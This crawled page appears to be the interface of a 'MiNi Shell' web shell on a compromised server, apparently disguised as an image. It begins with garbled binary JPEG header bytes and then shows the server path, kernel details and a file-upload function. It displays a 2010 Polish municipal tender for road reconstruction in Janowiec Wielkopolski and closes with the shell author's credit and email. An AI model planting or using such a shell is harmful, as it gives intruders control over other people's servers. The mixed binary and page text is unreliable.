JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100310/66112-N-2010.html

<p class="kh_header"><b>Janowiec Wielkopolski: Przebudowa dróg lokalnych w Janowcu Wielkopolskim oraz usługa bankowa w zakresie wykupu wierzytelności pieniężnych</b><br>
<b>Numer ogłoszenia: 66112 - 2010; data zamieszczenia: 10.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Janowiec Wielkopolski , ul. Gnieźnieńska 3, 88-430 Janowiec Wielkopolski, woj. kujawsko-pomorskie, tel. 052 3023034, faks 052 3023020.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um-janowiecwlkp.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg lokalnych w Janowcu Wielkopolskim oraz usługa bankowa w zakresie wykupu wierzytelności pieniężnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na przebudowie dróg lokalnych w Janowcu Wielkopolskim  oraz usługa bankowa w zakresie wykupu wierzytelności pieniężnych. 
1)  Przedmiotem zamówienia w zakresie wykonania robót budowlanych   jest  przebudowa dróg lokalnych w Janowcu Wielkopolskim o łącznej długości 1.038,40 mb w następującym zakresie : 
- zakres I:    ulica T. Kościuszki o długości 244,0 m;  szer. 5,50 m;
- zakres II:  ulica Kwiatowa  L = 119,9 m; szer. 5,50m;
- zakres III:  ulica Świerkowa L= 153,60 m; szer. 5,00m;
- zakres IV:  ulica Sportowa  L= 106,90 m; szer. 5,00 m;
- zakres V:   ulica Leśna L=160,0 m;  szer. 5,50 m;
- zakres VI:  ulica K. Pułaskiego L=168,50 m; szer. 5,00 m, sięgacz L=85,5 m ; szerokość 5,0 m;
     
      2)  W ramach robót budowlanych  w szczególności  należy wykonać następujący zakres rzeczowy:
 
    a)Konstrukcja jezdni ul. Kościuszki i ul. Leśna :
- warstwa ścieralna z betonu asfaltowego KR1-2  0-12,8mm h=3 cm;
- warstwa wiążąca z betonu asfaltowego KR!-2  0-16mm   h=4 cm;
- skropienie podbudowy emulsja asfaltowa w ilości 1,00 kg/m2;
- podbudowa w. górna z tłucznia wapiennego 0-31,5 mm h=10 cm;
- podbudowa w. dolna z tłucznia wapiennego 0-63 mm h=20 cm;
- krawężnik uliczny przejazdowy; 
- ściek przykrawężnikowy z kostki 8x10x20; 
- ława betonowa z oporem z betonu B-15 pod ściek i krawężnik;
- w ulicy Kościuszki chodnik dla pieszych z kostki betonowej szarej 6x10x20 na podsypce pisakowej h=10 cm i wjazdy z kostki betonowej czerwonej 8x10x20 
na podsypce cementowo-pisakowej h=5 cm na podbudowie z betonu;  

b)Konstrukcja nawierzchni  ul. Świerkowej, Kwiatowej, Sportowej 
- warstwa ścieralna z betonu asfaltowego KR1-2  0-12,8mm h=3 cm;
- warstwa wiążąca z betonu asfaltowego KR!-2  0-16mm   h=4 cm;
- skropienie podbudowy emulsja asfaltowa w ilości 1,00 kg/m2;
- podbudowa w. górna z tłucznia wapiennego 0-31,5 mm h=10 cm;
- podbudowa w. dolna z tłucznia wapiennego 0-63 mm h=15 cm;
- krawężnik uliczny przejazdowy ;
- ściek przykrawężnikowy z kostki 8x10x20  w ul. Świerkowej i Kwiatowej ;
- ława betonowa z oporem z betonu B-15 pod ściek i krawężnik ( ul. Świerkowa i Kwiatowa);
- w ulicy Kwiatowej - 3 studnie chłonne z kręgów żelbetowych śr. 1,0 m i 3 studzienki ściekowe;
- w ul. Świerkowej - 2 studnie chłonne z kręgów żelbetowych śr. 1,0 m i 3 studzienki ściekowe;

c)Konstrukcja nawierzchni  ul. K. Pułaskiego  
- warstwa ścieralna z betonu asfaltowego KR2  0-12,8mm h=4 cm;
- warstwa wiążąca z betonu asfaltowego KR2  0-16mm   h=4 cm;
- skropienie podbudowy i w. wiążącej  emulsją asfaltową kationową 60% w ilości 1,00 kg/m2; 
- podbudowa w. górna z tłucznia twardego  0-31,5 mm h=10 cm;
- podbudowa w. dolna z tłucznia twardego  0-63 mm h=15 cm;
- podsypka piaskowa h=10 cm;
- krawężnik uliczny istniejący i krawężnik przejazdowy ze ściekiem 40*30*15;
- ściek przykrawężnikowy z kostki 8x10x20  w ul. Świerkowej i Kwiatowej ;
- ława betonowa z oporem z betonu B-15 pod ściek i krawężnik; 
-  chodnik dla pieszych z kostki betonowej czerwonej  6x10x20 na podsypce piaskowo-cementowej h+5 cm z podsypką piaskową h=10 cm i wjazdy z kostki betonowej grafitowej  8x10x20 na podsypce cementowo-pisakowej h=5 cm na podbudowie z tłucznia twardego h=20 cm;  
- ustawienie 2 pionowych znaków drogowych; 

        d)Konstrukcja nawierzchni sięgacza ul. K. Pułaskiego
- kostka betonowa EKO typu behaton  h=8cm  kolor szary,  wypełniona grysem bazaltowym   2-5mm na podsypce piaskowej h=5 cm;
- podbudowa warstwa górna z tłucznia twardego 0-31,5 mm h=10cm 
- podbudowa warstwa dolna z tłucznia twardego 0-63 mm h=15 cm;
- podsypka piaskowa h=10 cm;
- ściek prefabrykowany betonowy 40*30*15 w osi jezdni;
- krawężnik prawostronny 15*30*100 i lewostronny przejazdowy 15*22*100 ze ściekiem  prefabrykowanym na ławie betonowej z betonu B-15;
- obrzeże betonowe 8*30*100 na ławie betonowej z betonu B-15;
- chodnik dla pieszych z kostki betonowej  6*18*20 czerwona na podsypce cementowo- piaskowej  h=10 cm;
 - zjazdy na posesje z kostki betonowej grafitowej 8*10*20  na podsypce cementowo-piaskowej h=5 cm na podbudowie z tłucznia twardego;

3) Przedmiot zamówienia  opisany jest  szczegółowo w poniższych dokumentach:
     załącznik nr 1: dokumentacja budowlano-wykonawcza
    pn. Przebudowa ul. T. Kościuszki, Kwiatowej, Świerkowej, Sportowej i Leśnej w Janowcu Wlkp.  i pn. Przebudowa ul. K. Pułaskiego w Janowcu Wielkopolskim
  Załącznik nr 2 - specyfikacja techniczna wykonania i odbioru robót  - 
        Ogólne specyfikacje techniczne i Szczegółowe specyfikacje techniczne  odrębne do każdej dokumentacji budowlano-wykonawczej                                 
Załącznik nr 3  - przedmiary  robót dla każdej ulicy odrębnie:               
- które stanowią załącznik do niniejszej specyfikacji oraz są dostępne na stronie internetowej zamawiającego  jako załącznik do specyfikacji.

  2. 2 Usługa bankowa. 

Usługa bankowa polega na dokonaniu wykupu wierzytelności, jaką będzie wartość wykonanych robót budowlanych wraz z należnym podatkiem VAT. 
Wykonawca, jako Zbywca zapewni, że: 
1)	podpisze umowę o wykup wierzytelności z wybranym bankiem nie później niż w ciągu 30 dni od rozpoczęcia robót budowlanych;
2)	wykupem wierzytelności objęte będzie całe zamówienie  (dalej nazywane, jako roboty), na które wykonawca złożył najkorzystniejszą ofertę;
3)	wykupem wierzytelności będą objęte faktury za wykonane roboty, których rozliczenie następować będzie po zakończeniu i odbiorze bez usterek;
4)	wykup wierzytelności będzie dokonany wyłącznie przez Bank działający na podstawie ustawy z dnia 29.08.1997r Prawo bankowe (tj. Dz. U. z 2002r Nr 72 poz. 665 ) w terminie nieprzekraczającym 30 dni od zakończenia i odbioru wykonanych robót bez usterek;
5)	spłata wykupionej przez Bank wierzytelności będzie realizowana przez Zamawiającego przez okres 10 lat w ratach miesięcznych; 
6)	Zamawiający  przewiduje  okres karencji w spłacie rat kapitałowych liczony do końca roku 2010r.;
7)	rozpoczęcie spłaty kapitału nastąpi od miesiąca następującego po upływie okresu karencji w spłacie kapitału; 
8)	zmiana harmonogramu spłaty nie może powodować naliczania jakiejkolwiek prowizji przez Bank;
9)	w przypadku udzielenia zamówień dodatkowych Bank wykupi dodatkowe wierzytelności na warunkach, jak wykup wierzytelności podstawowych;
kupu wierzytelności pieniężnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.24.52-5, 66.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane ( potwierdzone dokumentami, że roboty te zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone)  odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. Zamawiający za roboty spełniające ten warunek uzna roboty wykonane  w zakresie budowy,  przebudowy dróg z wykonaniem podbudowy oraz  nawierzchni bitumicznej o wartości zamówienia co najmniej  600.000,00  zł  każda ( należy przyjąć że jedna robota budowlana - to robota wykonana w ramach jednego kontraktu ). Ocena spełniania warunku zostanie dokonana na podstawie przedłożonych przez wykonawcę dokumentów o których mowa w rozdziale 6 punkt 6.5.1 specyfikacji - na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią formularza nr 2 do SIWZ -  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że osoba, która będzie pełnić obowiązki  kierownika budowy posiada doświadczenie zawodowe co najmniej 3 lata  w pełnieniu funkcji  kierownika budowy legitymujący się:

        - uprawnieniami  do kierowania robotami budowanymi bez ograniczeń w specjalności drogowej   - wymaganymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm. ). 
         
         Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane które zostały wydane na podstawie wcześniej obowiązujących przepisów.
   
Ocena spełniania warunku zostanie dokonana na podstawie przedłożonych przez wykonawcę dokumentów o których mowa w rozdziale 6  punkt 6.5.2 i 6.5.3 SIWZ   2 - na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią formularza nr 2 do SIWZ -  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)   kosztorys ofertowy na poszczególne ulice  dla zakresu od I do VI .
        2)   harmonogram spłaty wykonanych robót wg zasad określonych w rozdziale 3 ust. 3 punkt 16  opracowany  dla   WIBOR 1M z dnia 15.03.2010 r.
         3)  dokument potwierdzający prawo wykupu wierzytelności tj. promesa Banku lub umowa  pomiędzy Bankiem, a wykonawcą lub zaświadczenie Banku, świadczące o wykupie wierzytelności przez ten Bank. Dokument powyższy o wykup wierzytelności nie może mieć charakteru intencyjnego. Dokument ten musi jednoznacznie wskazywać na zobowiązanie Banku do wykupu wierzytelności objętej niniejszym zamówieniem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych warunków;

1) zajdzie konieczność wprowadzenia istotnych zmian w dokumentacji projektowej, sposobie lub technologii wykonania przedmiotu umowy;

2) nastąpi zmiana obowiązującej stawki VAT;

       3)  przy zawieraniu umowy nie można było przewidzieć rozmiaru lub kosztów prac;

       4) zajdzie konieczność zmiany terminu wykonania przedmiotu zamówienia na skutek:

              a) warunków atmosferycznych uniemożliwiających ze względów technologicznych wykonanie  przedmiotu umowy w ustalonym terminie lub negatywnie wpływających na jakość wykonania lub trwałość przedmiotu zamówienia;

              b) wystąpienia konieczności wykonania robót dodatkowych; ewentualnych kolizji z zakrytymi  urządzeniami, zmiany technologii wykonania robót budowlanych; 

              c) przedłużającego się oczekiwania na ewentualne uzgodnienia, decyzje administracyjne itp.

              d) działania siły wyższej.

5) wystąpienia konieczności, że na wskutek okoliczności niezależnych od wykonawcy i zamawiającego,  należy dokonać zmiany osób ( upoważnionych do występowania w imieniu Wykonawcy lub  Zamawiającego ) przy pomocy których Wykonawca lub  Zamawiający realizuje przedmiot umowy;

6) na wskutek okoliczności niezależnych od wykonawcy   należy dokonać zmiany kierownika budowy ( ustanie stosunku pracy lub inne losowe zdarzenie niezależne od wykonawcy),  pod warunkiem spełnienia wymaganego warunku przez nowo wskazaną osobę;

 7) za zgodą zamawiającego powierzenie podwykonawcom innej części zamówienia niż wykazane w  ofercie lub zmiana podwykonawcy w trakcie trwania robót budowlanych;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.janowiec.wlkp.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Janowcu Wielkopolskim; ul. Gnieźnieńska 3; 88-430 Janowiec Wielkopolski - pokój nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2010 godzina 10:00, miejsce: Urząd Miejski w Janowcu Wielkopolskim; ul. Gnieźnieńska 3; 88-430 Janowiec Wielkopolski - sekretariat pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com